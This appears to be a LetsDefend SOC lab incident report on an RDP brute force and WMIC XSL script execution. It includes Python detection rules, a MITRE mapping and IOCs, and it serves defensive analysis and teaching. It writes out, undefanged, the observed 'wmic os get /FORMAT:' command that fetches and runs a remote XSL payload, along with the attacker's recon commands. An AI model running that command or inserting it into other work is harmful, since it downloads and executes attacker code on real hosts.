An RDP brute force attack originating from 146.70.246.119 successfully compromised the local account letsdefend on host Ambrosine (172.16.17.113). Following the successful login, the attacker conducted hands-on-keyboard reconnaissance before pivoting to a WMIC LOLBin technique, using the /FORMAT flag to fetch and execute a remote XSL script. The payload URL was flagged malicious and attributed to SILENTBUILDER — a dropper and downloader associated with a subgroup of the Conti ransomware collective. No additional network connections were observed. The endpoint has been contained.
August 12, 2024 — 01:50 PM
| Field | Value |
|---|---|
| Hostname | Ambrosine |
| IP Address | 172.16.17.113 |
| Process | WMIC.exe |
| Process Path | C:\Windows\System32\Wbem\ |
| Parent Process | C:\Windows\System32\cmd.exe |
| Working Directory | C:\Users\LetsDefend\ |
| Field | Value |
|---|---|
| Attacker IP | 146.70.246.119 |
| Compromised Account | letsdefend (local) |
| Access Method | RDP brute force → successful login |
| AbuseIPDB Verdict | Confirmed malicious |
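The access pattern in this table (a brute-force burst followed by a successful RDP logon from the same source) is the kind of sequence a SOC can correlate directly from Windows Security events. The following is an added example for this report, not part of the original analysis or of any LetsDefend tooling: it pairs a run of 4625 (failed logon) events from one source IP with a later 4624 (successful logon) of LogonType 10 (RemoteInteractive, i.e. RDP) from the same IP. The event records are constructed for the example (the attacker IP, host and account are the ones named in the report); the failure threshold and time window are assumptions.

```python
"""Detect an RDP brute force that ends in a successful logon.

Added example, not part of the original report or any vendor tooling.
Correlates Windows Security events: a burst of 4625 (failed logon) from one
source IP followed by a 4624 (successful logon) with LogonType 10 (RDP) from
the same IP. Records below are constructed; threshold/window are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log records (fields modelled on 4625/4624 event data).
EVENTS = [
    # 15 failed RDP logons from the attacker IP inside one minute
    *[
        {"EventID": 4625, "TimeCreated": f"2024-08-12T13:41:{i:02d}",
         "IpAddress": "146.70.246.119", "TargetUserName": "letsdefend",
         "LogonType": 10, "WorkstationName": "Ambrosine"}
        for i in range(0, 30, 2)
    ],
    # a legitimate RDP logon from an internal host: must not fire
    {"EventID": 4624, "TimeCreated": "2024-08-12T13:42:10",
     "IpAddress": "172.16.17.50", "TargetUserName": "jdoe",
     "LogonType": 10, "WorkstationName": "Ambrosine"},
    # the successful RDP logon that ends the brute force
    {"EventID": 4624, "TimeCreated": "2024-08-12T13:42:31",
     "IpAddress": "146.70.246.119", "TargetUserName": "letsdefend",
     "LogonType": 10, "WorkstationName": "Ambrosine"},
]

FAIL_THRESHOLD = 10             # assumption: >= 10 failures counts as a burst
WINDOW = timedelta(minutes=5)   # assumption: failures must precede success within 5 min


def _ts(rec):
    """Parse the record's ISO-8601 timestamp."""
    return datetime.fromisoformat(rec["TimeCreated"])


def detect_rdp_bruteforce_success(events, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return one alert per successful RDP logon (4624, LogonType 10) that was
    preceded by at least `threshold` failed logons (4625) from the same source
    IP within `window`."""
    failures = defaultdict(list)          # src_ip -> [failure timestamps]
    for rec in events:
        if rec["EventID"] == 4625:
            failures[rec["IpAddress"]].append(_ts(rec))

    alerts = []
    for rec in sorted(events, key=_ts):
        if rec["EventID"] != 4624 or rec["LogonType"] != 10:
            continue
        success_at = _ts(rec)
        recent = [t for t in failures.get(rec["IpAddress"], [])
                  if success_at - window <= t <= success_at]
        if len(recent) >= threshold:
            alerts.append({
                "src_ip": rec["IpAddress"],
                "account": rec["TargetUserName"],
                "host": rec["WorkstationName"],
                "failed_attempts": len(recent),
                "success_at": rec["TimeCreated"],
            })
    return alerts


if __name__ == "__main__":
    for a in detect_rdp_bruteforce_success(EVENTS):
        print(f"[ALERT] RDP brute force succeeded: {a['src_ip']} -> "
              f"{a['account']}@{a['host']} after {a['failed_attempts']} failures")
```

The success event is the trigger and the failures are looked up backwards from it, so a slow brute force that never succeeds produces no alert here; a separate threshold-only rule on 4625 volume would cover that case.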
The attacker leveraged WMIC XSL Script Processing (T1220) — a well-documented LOLBin technique — to execute remote code while remaining within trusted Windows binaries. The full command observed:
`wmic os get /FORMAT:"https://files-ld.s3.us-east-2.amazonaws.com/wmicscript.xsl"`
The remote URL returned 2 malicious flags on VirusTotal, with analysis noting activity consistent with SILENTBUILDER — a dropper/downloader used by a Conti subgroup. The code summary described the payload as a malicious MSI masquerading as a Notepad++ installer.
Prior to WMIC execution, the attacker ran manual recon:
- `arp -a` — ARP cache/network host enumeration
- `netstat -an` — active connection enumeration
- `net localgroup administrators` — local privilege enumeration
- `whoami` — user context confirmation
- `runas powershell` — privilege escalation attempt

Device action at time of alert was Allowed. No further outbound or inbound connections were observed from the endpoint post-execution.

Verdict: True Positive — Incident confirmed. Endpoint contained.
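Both the T1220 command and the recon sequence above leave a clear trail in process-creation telemetry. The following is an added example for this report, not part of the original analysis or of any vendor rule set: it scans Sysmon-style process-creation records for (1) `wmic.exe` launched with a `/FORMAT` value that is an http(s) URL, which is the remote XSL pattern the report describes, and (2) a burst of distinct discovery commands from one user within a short window. The records are constructed from the commands listed in the report (the observed URL is kept as it appears on the page); the field names follow Sysmon Event ID 1, and the recon threshold and window are assumptions.

```python
"""Flag WMIC remote XSL execution (T1220) and the recon burst that preceded it.

Added example, not part of the original report or any vendor rule set.
Scans Sysmon-style process-creation records (Event ID 1 field names) for
wmic.exe with a remote /FORMAT URL and for a run of discovery commands from
one user. Records are constructed; threshold and window are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# wmic[.exe] ... /FORMAT:"https://..." (quotes optional, case-insensitive);
# a built-in format such as /FORMAT:csv has no URL and does not match.
WMIC_REMOTE_FORMAT = re.compile(
    r"(?i)\bwmic(?:\.exe)?\b.*?/format\s*:\s*[\"']?\s*(https?://[^\s\"']+)"
)

# Discovery commands from the report, matched on the first command-line token.
RECON_CMDS = {"arp", "netstat", "net", "whoami", "runas"}

RECON_THRESHOLD = 3                    # assumption: 3+ distinct discovery commands
RECON_WINDOW = timedelta(minutes=10)   # assumption: ... within 10 minutes

# Constructed process-creation events shaped like Sysmon Event ID 1 data.
CMD = r"C:\Windows\System32\cmd.exe"
EVENTS = [
    {"UtcTime": "2024-08-12T13:45:02", "User": "AMBROSINE\\letsdefend",
     "ParentImage": CMD, "CommandLine": "arp -a"},
    {"UtcTime": "2024-08-12T13:45:20", "User": "AMBROSINE\\letsdefend",
     "ParentImage": CMD, "CommandLine": "netstat -an"},
    {"UtcTime": "2024-08-12T13:45:55", "User": "AMBROSINE\\letsdefend",
     "ParentImage": CMD, "CommandLine": "net localgroup administrators"},
    {"UtcTime": "2024-08-12T13:46:10", "User": "AMBROSINE\\letsdefend",
     "ParentImage": CMD, "CommandLine": "whoami"},
    {"UtcTime": "2024-08-12T13:46:40", "User": "AMBROSINE\\letsdefend",
     "ParentImage": CMD, "CommandLine": "runas powershell"},
    # benign inventory use of wmic with a built-in output format: must not fire
    {"UtcTime": "2024-08-12T13:47:00", "User": "AMBROSINE\\svc_inventory",
     "ParentImage": CMD, "CommandLine": "wmic os get /FORMAT:csv"},
    # the observed T1220 command, URL as it appears in the report
    {"UtcTime": "2024-08-12T13:49:58", "User": "AMBROSINE\\letsdefend",
     "ParentImage": CMD,
     "CommandLine": 'wmic os get /FORMAT:"https://files-ld.s3.us-east-2.amazonaws.com/wmicscript.xsl"'},
]


def detect_wmic_remote_xsl(events):
    """Return one finding per wmic launch whose /FORMAT value is a remote URL."""
    findings = []
    for rec in events:
        m = WMIC_REMOTE_FORMAT.search(rec["CommandLine"])
        if m:
            findings.append({"time": rec["UtcTime"], "user": rec["User"],
                             "parent": rec["ParentImage"], "url": m.group(1),
                             "technique": "T1220"})
    return findings


def detect_recon_burst(events, threshold=RECON_THRESHOLD, window=RECON_WINDOW):
    """Return users who ran >= threshold distinct discovery commands inside `window`."""
    by_user = defaultdict(list)           # user -> [(timestamp, command)]
    for rec in events:
        first = rec["CommandLine"].split()[0].lower().rsplit("\\", 1)[-1]
        if first.endswith(".exe"):
            first = first[:-4]
        if first in RECON_CMDS:
            by_user[rec["User"]].append((datetime.fromisoformat(rec["UtcTime"]), first))

    findings = []
    for user, runs in by_user.items():
        runs.sort()
        for i, (start, _) in enumerate(runs):
            in_window = {cmd for t, cmd in runs[i:] if t - start <= window}
            if len(in_window) >= threshold:
                findings.append({"user": user, "commands": sorted(in_window),
                                 "first_seen": start.isoformat()})
                break   # one finding per user is enough for triage
    return findings


if __name__ == "__main__":
    for f in detect_wmic_remote_xsl(EVENTS):
        print(f"[{f['technique']}] {f['user']} ran wmic with remote XSL {f['url']} "
              f"(parent {f['parent']}) at {f['time']}")
    for f in detect_recon_burst(EVENTS):
        print(f"[RECON] {f['user']} ran {', '.join(f['commands'])} from {f['first_seen']}")
```

The WMIC rule keys on the `/FORMAT` value rather than on the filename, so any remote `.xsl` location fires, while built-in formats such as `csv` or `list` stay quiet; the recon rule counts distinct commands rather than raw events so a single repeated `whoami` does not trip it.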
| Technique ID | Tactic | Technique |
|---|---|---|
| T1110 | Credential Access | Brute Force |
| T1021.001 | Lateral Movement | Remote Services: Remote Desktop Protocol |
| T1059.003 | Execution | Command and Scripting Interpreter: Windows Command Shell |
| T1033 | Discovery | System Owner/User Discovery |
| T1049 | Discovery | System Network Connections Discovery |
| T1016 | Discovery | System Network Configuration Discovery |
| T1069.001 | Discovery | Permission Groups Discovery: Local Groups |
| T1220 | Defense Evasion | XSL Script Processing |
| Type | Value |
|---|---|
| Attacker IP | 146.70.246.119 |
| Victim Host IP | 172.16.17.113 |
| Malicious URL | hxxps[://]files-ld[.]s3[.]us-east-2[.]amazonaws[.]com/wmicscript[.]xsl |
| Process | WMIC.exe |
| Parent Process | cmd.exe |
| Compromised Account | letsdefend |
| Malware Family | SILENTBUILDER (Conti subgroup) |